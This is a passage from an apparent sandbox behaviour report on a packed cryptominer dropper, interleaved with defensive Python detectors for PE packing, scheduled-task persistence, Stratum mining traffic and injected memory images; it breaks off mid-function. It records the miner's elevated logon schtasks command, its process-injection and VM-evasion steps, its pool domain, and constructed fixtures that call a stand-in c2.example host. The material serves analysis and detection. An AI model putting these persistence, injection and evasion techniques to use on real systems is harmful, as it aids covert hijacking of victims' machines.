                  Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_01
                  Source: explorer.exe String found in binary or memory: id-cmc-addExtensions
                  Source: explorer.exe String found in binary or memory: set-addPolicy
                  Source: explorer.exe String found in binary or memory: id-cmc-addExtensions
                  Source: explorer.exe String found in binary or memory: set-addPolicy
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\conhost.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static file information: File size 3609088 > 1048576
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x2f2e00
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C3665 push ss; retf
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C36AF push ss; retf
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BC283 push ebp; iretd
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BECAF pushfd ; ret
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BC49B push esp; retf 0000h
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C1498 push ebp; ret
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BD161 push edi; iretd
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BD1D3 push cs; retf
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BF1B4 push ecx; iretd
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C4980 push ecx; retf
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C2591 push edx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_05644650 push esp; iretd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_0564460E push es; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_05643C58 push esp; iretd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_05643C92 push esp; iretd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_05645F40 push es; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F7D30 push eax; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F7E69 push eax; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F8110 push edx; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F8091 push ecx; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F82F1 push edx; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F3571 push ds; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F8570 push ebx; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F3541 push ds; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F3590 push ds; retn 0009h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F97D8 push ecx; ret
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00623B00 push rax; retf
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00623BFF push rax; iretd
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_006238C0 push rax; retn 0009h
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00623AB7 push rax; retf 0009h
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00409B00 push rax; retf
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Static PE information: section name: (nameless)
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Static PE information: section name: (nameless)
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Static PE information: section name: (nameless)
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Static PE information: section name: (nameless)
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Static PE information: section name: (nameless)
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Static PE information: section name: (nameless)
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Static PE information: section name: .loHdXUK
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Static PE information: section name: .adata
Source: sistem.exe.1.dr  Static PE information: section name: (nameless)
Source: sistem.exe.1.dr  Static PE information: section name: (nameless)
Source: sistem.exe.1.dr  Static PE information: section name: (nameless)
Source: sistem.exe.1.dr  Static PE information: section name: (nameless)
Source: sistem.exe.1.dr  Static PE information: section name: (nameless)
Source: sistem.exe.1.dr  Static PE information: section name: (nameless)
Source: sistem.exe.1.dr  Static PE information: section name: .2w140TT
Source: sistem.exe.1.dr  Static PE information: section name: .adata
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Static PE information: real checksum: 0x378b16 should be: 0x37c3ee
Source: sistem.exe.1.dr  Static PE information: real checksum: 0x374485 should be: 0x363658
Source: initial sample  Static PE information: section name: (nameless) entropy: 7.99714150919
Source: initial sample  Static PE information: section name: (nameless) entropy: 7.89828462596
Source: initial sample  Static PE information: section name: (nameless) entropy: 7.99330469272
Source: initial sample  Static PE information: section name: (nameless) entropy: 7.78378163159
Source: initial sample  Static PE information: section name: .rsrc entropy: 7.22431447957
Source: initial sample  Static PE information: section name: .loHdXUK entropy: 7.91937517669
Source: initial sample  Static PE information: section name: (nameless) entropy: 7.99376649228
Source: initial sample  Static PE information: section name: (nameless) entropy: 7.99416148233
Source: initial sample  Static PE information: section name: (nameless) entropy: 7.79638828934
Source: initial sample  Static PE information: section name: .rsrc entropy: 7.95896631222
Source: initial sample  Static PE information: section name: .2w140TT entropy: 7.91810923308
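The three static findings above (section headers with no name, section entropy close to the 8.0 maximum, and a header checksum that does not match the file) are what a packer leaves behind. The Python below is an added illustration, not part of the Joe Sandbox report, that reproduces those checks with the standard library only: it walks the section table, computes Shannon entropy per section, and recomputes the PE checksum with the same fold-and-add algorithm imagehlp's CheckSumMappedFile uses. `build_minimal_pe` is a constructed test fixture that emits a synthetic, non-loadable PE32 so the script runs without the sample; on a real file, pass `open(path, "rb").read()` to `analyze_pe`. The 7.0 entropy threshold is an assumption.

```python
import math
import struct
import sys

# CheckSum lives at offset 64 of the optional header in both PE32 and PE32+.
OPT_CHECKSUM_OFFSET = 64
SECTION_HEADER_SIZE = 40
HIGH_ENTROPY = 7.0  # assumption: above this a section is almost always packed/encrypted


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """Standard PE image checksum: sum all dwords except the CheckSum field itself,
    folding carries back in, fold to 16 bits, then add the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue  # the field being computed counts as zero
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def analyze_pe(data: bytes) -> dict:
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt_off = e_lfanew + 24
    checksum_off = opt_off + OPT_CHECKSUM_OFFSET
    header_checksum = struct.unpack_from("<I", data, checksum_off)[0]
    computed = pe_checksum(data, checksum_off)

    sections = []
    sec_off = opt_off + size_opt
    for i in range(num_sections):
        raw_name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", data, sec_off + i * SECTION_HEADER_SIZE)
        name = raw_name.rstrip(b"\0").decode("ascii", "replace")
        sections.append({"name": name,
                         "entropy": shannon_entropy(data[raw_ptr:raw_ptr + raw_size])})
    return {
        "sections": sections,
        "nameless_sections": sum(1 for s in sections if s["name"] == ""),
        "high_entropy_sections": [s["name"] for s in sections if s["entropy"] > HIGH_ENTROPY],
        "header_checksum": header_checksum,
        "computed_checksum": computed,
        # Zero is normal for unsigned user-mode binaries; a non-zero *wrong* value means
        # the header was rewritten after the linker ran (packer or post-build patching).
        "checksum_mismatch": header_checksum != 0 and header_checksum != computed,
    }


def build_minimal_pe(sections, checksum: int = 0) -> bytes:
    """Constructed fixture: a tiny PE32 with the given (name, bytes) sections.
    Parseable by analyze_pe, not loadable by Windows."""
    n = len(sections)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, OPT_CHECKSUM_OFFSET, checksum)
    file_align = 0x200
    hdrs, body, raw_ptr = b"", b"", file_align
    for name, payload in sections:
        hdrs += struct.pack("<8sIIIIIIHHI", name, len(payload), raw_ptr,
                            len(payload), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += payload
        raw_ptr += len(payload)
    header = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs
    return header.ljust(file_align, b"\0") + body


if __name__ == "__main__":
    report = analyze_pe(open(sys.argv[1], "rb").read())
    for s in report["sections"]:
        print(f"{s['name'] or '(nameless)':<10} entropy {s['entropy']:.3f}")
    print(f"checksum header 0x{report['header_checksum']:x} computed 0x{report['computed_checksum']:x}"
          f" mismatch={report['checksum_mismatch']}")
```

A wrong checksum does not stop a user-mode executable from running; Windows verifies it only for kernel drivers and a few boot-time system DLLs, so the mismatch is a forensic indicator that the header was rewritten after linking rather than a functional defect. Several nameless sections at entropy above 7.9 next to randomly named ones (.loHdXUK, .2w140TT) is the typical profile of a packed stub whose real payload is unpacked in memory, which is also why the interesting behaviour in this report comes from the injected AppLaunch.exe and conhost.exe processes rather than the dropped files themselves.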

Persistence and Installation Behavior:

Sample is not signed and drops a device driver
Source: C:\Windows\System32\conhost.exe  File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  File created: C:\Users\user\AppData\Local\Temp\Microsoft.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  File created: C:\Users\user\AppData\Local\Temp\sistem.exe
Source: C:\Windows\System32\conhost.exe  File created: C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe  File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
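The task above gives the dropped loader an elevated (/rl highest), logon-triggered restart from a Temp path. The Python below is an added example, not taken from the report, that turns that shape into a triage rule applicable to two data sources: the on-disk task XML (the files under C:\Windows\System32\Tasks, or the output of `schtasks /query /tn <name> /xml`), and the `schtasks /create` command line itself as it shows up in process-creation telemetry, so the same rule fires before the task file is ever read. SAMPLE_CMDLINE is the exact command from the report; SAMPLE_TASK_XML is a constructed equivalent of the XML that command produces; the suspicious-directory list and the scoring are assumptions to tune per environment.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumption: directories a legitimate elevated logon task has no business running from.
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                   "\\users\\public\\", "\\programdata\\", "\\windows\\temp\\")
PERSISTENT_TRIGGERS = {"LogonTrigger", "BootTrigger"}


def parse_task_xml(task_name: str, xml_data) -> dict:
    """Extract commands, run level and trigger types from a Task Scheduler XML document.
    On disk these files are UTF-16 with a BOM: read them in binary and pass the bytes
    so expat honours the BOM."""
    root = ET.fromstring(xml_data)
    triggers_el = root.find("t:Triggers", NS)
    return {
        "task_name": task_name,
        "commands": [(c.text or "").strip() for c in root.findall(".//t:Exec/t:Command", NS)],
        "run_level": root.findtext(".//t:Principal/t:RunLevel",
                                   default="LeastPrivilege", namespaces=NS),
        "triggers": [] if triggers_el is None
                    else [el.tag.rsplit("}", 1)[-1] for el in triggers_el],
    }


def parse_schtasks_create(cmdline: str) -> dict:
    """Map a `schtasks /create ...` command line onto the same fields as parse_task_xml."""
    # Tokenise on whitespace but keep double-quoted arguments (paths with spaces) whole.
    tokens = [q or w for q, w in re.findall(r'"([^"]*)"|(\S+)', cmdline)]
    opts = {}
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("/tn", "/tr", "/sc", "/rl"):
            opts[tok.lower()] = tokens[i + 1]
    schedule = opts.get("/sc", "").lower()
    return {
        "task_name": opts.get("/tn", ""),
        "commands": [opts.get("/tr", "")],
        "run_level": "HighestAvailable" if opts.get("/rl", "").lower() == "highest"
                     else "LeastPrivilege",
        "triggers": [{"onlogon": "LogonTrigger", "onstart": "BootTrigger"}.get(schedule, schedule)],
    }


def assess(task: dict) -> dict:
    """Score a parsed task. Elevation or boot survival alone is common in legitimate
    software; combined with a binary in a user-writable directory it is the malware shape."""
    reasons = []
    user_writable = [c for c in task["commands"]
                     if any(d in c.lower() for d in SUSPICIOUS_DIRS)]
    if user_writable:
        reasons.append("runs a binary from a user-writable directory: " + user_writable[0])
    if task["run_level"] == "HighestAvailable":
        reasons.append("requests highest available privileges (/rl highest)")
    if PERSISTENT_TRIGGERS & set(task["triggers"]):
        reasons.append("re-launches at logon/boot (/sc onlogon or onstart)")
    return {"task_name": task["task_name"], "reasons": reasons,
            "suspicious": bool(user_writable) and len(reasons) >= 2}


# The command line exactly as recorded in the report.
SAMPLE_CMDLINE = (r'schtasks /create /f /sc onlogon /rl highest /tn "services64" '
                  r'/tr "C:\Users\user\AppData\Local\Temp\services64.exe"')
# Constructed: the task XML that command produces (declaration and metadata omitted).
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Users\user\AppData\Local\Temp\services64.exe</Command></Exec></Actions>
</Task>"""


if __name__ == "__main__":
    for verdict in (assess(parse_schtasks_create(SAMPLE_CMDLINE)),
                    assess(parse_task_xml("services64", SAMPLE_TASK_XML))):
        print(verdict["task_name"], "suspicious" if verdict["suspicious"] else "ok")
        for reason in verdict["reasons"]:
            print("   -", reason)
```

Note the `/f` in the recorded command: it silently overwrites an existing task of the same name, so a task that already existed with a different action is not a reason to lower the score. Hunting on the XML side catches the same persistence when it was registered through the Task Scheduler COM API instead of schtasks.exe, which leaves no schtasks process-creation event at all.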

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports
Source: unknown  Network traffic detected: HTTP traffic on port 49778 -> 7777
Source: unknown  Network traffic detected: HTTP traffic on port 7777 -> 49778
Source: unknown  Network traffic detected: HTTP traffic on port 49779 -> 7777
Source: unknown  Network traffic detected: HTTP traffic on port 7777 -> 49779
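The HTTP-on-7777 finding here and the Stratum detection in the report summary are two instances of the same signal: protocols that identify themselves in their first bytes regardless of the port they ride on. The Python below is an added example, not from the report, that classifies a flow from its port pair and initial payload: an HTTP request or status line on a port outside a small allow-list, and Stratum's newline-delimited JSON-RPC, whose login message carries the wallet address and the miner user-agent. The sample payloads are constructed in XMRig's login format and are not traffic captured from this sample; the allow-list of HTTP ports is an assumption to tune for your environment.

```python
import json

# Assumption: ports on which an HTTP request/status line is unremarkable.
WELL_KNOWN_HTTP_PORTS = {80, 443, 8000, 8008, 8080, 8443, 8888}
HTTP_PREFIXES = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS ", b"HTTP/1.")
# JSON-RPC method names of the two common Stratum dialects: the XMRig/Monero family
# ("login", "submit", "job") and the Bitcoin-style "mining.*" methods.
STRATUM_METHODS = {"login", "submit", "job", "getjob", "keepalived",
                   "mining.subscribe", "mining.authorize", "mining.submit", "mining.notify"}


def classify_flow(src_port: int, dst_port: int, payload: bytes) -> dict:
    """Classify one TCP flow from its ports and the first bytes of application data.

    The port number is never trusted on its own: the signal is the protocol's own
    leading bytes, which is why HTTP on 7777 and Stratum on 443 are both caught.
    """
    server_port = min(src_port, dst_port)  # the ephemeral client port is the high one
    findings = []

    if payload.startswith(HTTP_PREFIXES) and server_port not in WELL_KNOWN_HTTP_PORTS:
        findings.append(f"http_on_nonstandard_port:{server_port}")

    # Stratum is one JSON object per line; inspect every line that looks like an object.
    for raw in payload.splitlines():
        line = raw.strip()
        if not line.startswith(b"{"):
            continue
        try:
            msg = json.loads(line)
        except ValueError:
            continue
        method = msg.get("method") if isinstance(msg, dict) else None
        if method not in STRATUM_METHODS:
            continue
        findings.append(f"stratum:{method}")
        params = msg.get("params")
        if isinstance(params, dict):
            if isinstance(params.get("login"), str):   # wallet address (XMRig dialect)
                findings.append("stratum_wallet:" + params["login"])
            if isinstance(params.get("agent"), str):   # miner user-agent, e.g. XMRig/6.x
                findings.append("stratum_agent:" + params["agent"])

    return {"server_port": server_port, "findings": findings,
            "mining": any(f.startswith("stratum:") for f in findings)}


# Constructed sample payloads; none of these bytes were captured from the sample.
SAMPLE_HTTP_ON_7777 = (b"POST /api/ HTTP/1.1\r\nHost: c2.example:7777\r\n"
                       b"Content-Type: application/x-www-form-urlencoded\r\n\r\nid=1")
SAMPLE_STRATUM_LOGIN = (b'{"id":1,"jsonrpc":"2.0","method":"login","params":'
                        b'{"login":"4CONSTRUCTEDWALLETNOTREAL","pass":"x","agent":"XMRig/6.16.4"}}\n')
SAMPLE_PLAIN_HTTP = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"


if __name__ == "__main__":
    for src, dst, data in ((49778, 7777, SAMPLE_HTTP_ON_7777),
                           (50001, 443, SAMPLE_STRATUM_LOGIN),
                           (50002, 80, SAMPLE_PLAIN_HTTP)):
        result = classify_flow(src, dst, data)
        print(f"{src}->{dst}: mining={result['mining']} {result['findings']}")
```

Two caveats from the report itself apply when deploying this. First, the pool connection comes from explorer.exe (see the domain query for mine.bmpool.org under HIPS / PFW evasion below), so a rule that keys on the process name of a miner binary sees nothing; the payload check is what survives the injection. Second, pools increasingly wrap Stratum in TLS, in which case only the SNI (the pool hostname) and the JA3/JA4 fingerprint of the client remain visible, and a TLS-inspecting proxy or endpoint telemetry is needed to see the login line at all.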
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  Process information set: NOOPENFILEERRORBOX (identical event repeated 90 times)
Source: C:\Windows\System32\conhost.exe  Process information set: NOOPENFILEERRORBOX (identical event repeated 102 times)
Source: C:\Windows\explorer.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (identical event repeated 2 times)

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)
Source: C:\Windows\explorer.exe  System information queried: FirmwareTableInformation
Source: C:\Windows\explorer.exe  System information queried: FirmwareTableInformation
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1836  Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  Window / User API: threadDelayed 3398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  Window / User API: threadDelayed 5671
Source: C:\Windows\System32\conhost.exe  Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe  Thread delayed: delay time: 922337203685477
Source: conhost.exe, 00000011.00000003.755448964.00000201F483F000.00000004.00000001.sdmp  Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?
Source: AppLaunch.exe, 00000001.00000002.739738609.000000000A288000.00000004.00000001.sdmp  Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
Source: sistem.exe, 00000008.00000002.730405844.0000000000C0A000.00000004.00000020.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe  Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Code function: 0_2_004074B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe  Domain query: mine.bmpool.org
Source: C:\Windows\explorer.exe  Network Connect: 157.90.156.89 116
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\sistem.exe  Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe  Memory allocated: C:\Windows\System32\conhost.exe base: 1B0F37B0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\services64.exe  Memory allocated: C:\Windows\System32\conhost.exe base: 201F1F70000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\services64.exe  Memory allocated: C:\Windows\System32\conhost.exe base: 224D5930000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe  Memory allocated: C:\Windows\System32\conhost.exe base: 25F9A6F0000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\sistem.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
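The findings above (conhost.exe writing a buffer beginning with 4D5A, the MZ signature, into explorer.exe at 0x140000000, the default image base for 64-bit executables, followed by page-granular writes at 0x140001000, 0x140367000 and so on under "Writes to foreign memory regions") are a complete PE being manually mapped into explorer. In a memory dump, an injected image of this kind shows up as an MZ/PE header at a page-aligned address that no entry in the process's module list accounts for. The Python below is an added example, not part of the report, that scans a dumped region for exactly that and reports architecture, image type, preferred base and whether a loaded module backs the address. `fake_pe_header` is a constructed, header-only fixture for the test; on a real case, feed `carve_pe_headers` the bytes of each committed region (from a minidump, Volatility's vadinfo/vaddump output, or ReadProcessMemory) together with the module list your tooling already gives you.

```python
import struct

PAGE = 0x1000
IMAGE_FILE_DLL = 0x2000
MACHINES = {0x14C: "x86", 0x8664: "x64"}


def carve_pe_headers(buf: bytes, region_base: int, loaded_modules=()) -> list:
    """Report every PE header found at a page-aligned offset of a dumped memory region.

    buf            : raw bytes of the region
    region_base    : virtual address of buf[0]
    loaded_modules : iterable of (base, size, name) from the process's module list;
                     a header inside none of them is an unbacked, manually mapped image
    """
    hits = []
    for off in range(0, len(buf), PAGE):
        if buf[off:off + 2] != b"MZ" or off + 0x40 > len(buf):
            continue
        e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
        pe = off + e_lfanew
        if not 0x40 <= e_lfanew < 0x1000 or pe + 24 + 64 > len(buf):
            continue
        if buf[pe:pe + 4] != b"PE\0\0":
            continue
        machine, nsections, _, _, _, _opt_size, chars = struct.unpack_from("<HHIIIHH", buf, pe + 4)
        opt = pe + 24
        is64 = struct.unpack_from("<H", buf, opt)[0] == 0x20B
        # ImageBase is at +24 (8 bytes) in PE32+ and at +28 (4 bytes) in PE32;
        # SizeOfImage is at +56 in both.
        image_base = (struct.unpack_from("<Q", buf, opt + 24)[0] if is64
                      else struct.unpack_from("<I", buf, opt + 28)[0])
        size_of_image = struct.unpack_from("<I", buf, opt + 56)[0]
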